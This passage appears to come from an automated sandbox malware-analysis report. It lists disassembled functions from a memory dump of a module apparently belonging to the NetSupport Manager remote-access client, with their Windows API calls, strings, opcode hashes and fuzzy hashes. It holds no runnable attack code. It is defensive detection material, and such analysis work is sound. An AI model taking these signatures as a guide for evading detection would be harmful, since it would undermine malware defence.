                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 180989782-0
                                                                                      • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                      • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                      • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                      • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                      Function 110B3090 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$EventObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2857295742-0
                                                                                      • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                      • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                      • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                      • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                      Function 110770E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                        • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                      • EqualRect.USER32(?,?), ref: 1107713C
                                                                                      • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                      Strings
                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                      • m_hWnd, xrefs: 11077177
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$DeferEqualPointsRect
                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                      • API String ID: 2754115966-2830328467
                                                                                      • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                      • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                      • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                      • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                      Function 110291D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104sleepthreadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                      • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                      • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: SleepThread$CreateMessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 3347742789-2740779761
                                                                                      • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                      • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                      • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                      • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                      Function 11089150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                      • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLock
                                                                                      • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                      • API String ID: 2752051264-327499879
                                                                                      • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                      • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                      • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                      • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                      Function 11143110 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                      • _strrchr.LIBCMT ref: 1114315A
                                                                                      • _strrchr.LIBCMT ref: 1114316A
                                                                                      • wsprintfA.USER32 ref: 11143185
                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                      • String ID: BILD
                                                                                      • API String ID: 2529650285-1114602597
                                                                                      • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                      • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                      • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                      • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                      Function 11065340 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                      • _memmove.LIBCMT ref: 110653B1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProfileString_memmove
                                                                                      • String ID: Device$No default printer,,LPT1:$Windows
                                                                                      • API String ID: 1665476579-2460060945
                                                                                      • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                      • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                      • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                      • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                      Function 110450BD Relevance: 7.9, APIs: 5, Instructions: 401COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3719176846-0
                                                                                      • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                      • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                      • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                      • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                      Function 11045160 Relevance: 7.8, APIs: 5, Instructions: 258COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeString$__wcsicoll_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3719176846-0
                                                                                      • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                      • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                      • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                      • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                      Function 110812D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • %02x, xrefs: 11081350
                                                                                      • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081387
                                                                                      • ..\CTL32\DataStream.cpp, xrefs: 1108139E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                      • API String ID: 2111968516-476189988
                                                                                      • Opcode ID: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                      • Instruction ID: f12dac7d373f74f5fe212c0395a9fec3f200c40d2e0a4ddded7d9712e57ff33a
                                                                                      • Opcode Fuzzy Hash: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                      • Instruction Fuzzy Hash: E621A375A052299FD724CF65DCC4EAEB3F8EF44308F0085AEE45A97640D670AD45CB60
                                                                                      Function 110253D0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110253E7
                                                                                      • GetDlgItem.USER32(?,00001399), ref: 11025421
                                                                                      • TranslateMessage.USER32(?), ref: 1102543A
                                                                                      • DispatchMessageA.USER32(?), ref: 11025444
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025486
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchItemTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 1381171329-0
